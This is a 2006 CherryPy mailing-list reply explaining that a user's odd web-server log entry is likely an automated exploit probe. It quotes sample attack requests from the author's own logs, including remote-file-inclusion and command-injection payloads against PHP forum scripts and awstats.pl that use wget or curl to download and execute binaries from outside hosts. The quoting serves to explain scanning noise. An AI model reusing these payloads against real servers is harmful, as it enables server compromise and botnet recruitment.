Menu
▾
▴
[Cherrypy-users] Re: logfile
|
From: Peter H. <pe...@en...> - 2006-01-15 22:22:00
|
dimitri pater wrote: > does anybody knows what the third line in my logfile means? It looks > suspicious to me... > > 2006/01/15 08:10:30 HTTP INFO 219.129.25.220 <http://219.129.25.220> - > GET /ttp://verify.qq.com/getimage/paycenterqqcard?0.8475128964591452 > HTTP/1.1 Suspicious how? Is "verify.qq.com" the address of your site? Is the rest of the URL roughly how it should look and you're concerned only about the incorrect "ttp://" part in front? Or do you mean none of that is even remotely valid for your site? If I saw that exact line in my own logs (which are obviously not for a qq.com site), I'd simply conclude it was one of the many attempts to exploit a bug in some product that script kiddies and zombies hammer at all of us all day long. I've seen stuff much more obscure than that, and consider most such a mere curiosity (or educational about just how flawed some software can be). (Here's a small sampling: "CONNECT 168.95.5.169:25 HTTP/1.0" "GET http://www.intel.com/ HTTP/1.1" "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" "GET /level/16/exec/-///pwd HTTP/1.1" and these less benign beauties which are likely turning machines the world over into zombies (though obviously non-Microsoft servers): "GET /tellafriend/inc/tell_a_friend.inc.php?script_root=http://geocitie s.com/zamelmania/fbi.gif?&cmd=cd /tmp;curl -O suxtefute.com/sess_3539283e27d73cae29fe2b80f9293f59;perl sess_3539283e27d73c ae29fe2b80f9293f59 HTTP/1.1" "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_ path=http://81.174.26.111/cmd.gif?&cmd=cd /tmp;wget 216.15.209.4/criman;chmod 744 criman;./criman;echo YYY;echo| HTTP/1.1" "GET /cgi-bin/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 209.136. 48.69/mirela;chmod +x mirela;./mirela;echo YYY;echo| HTTP/1.1" ) -Peter |
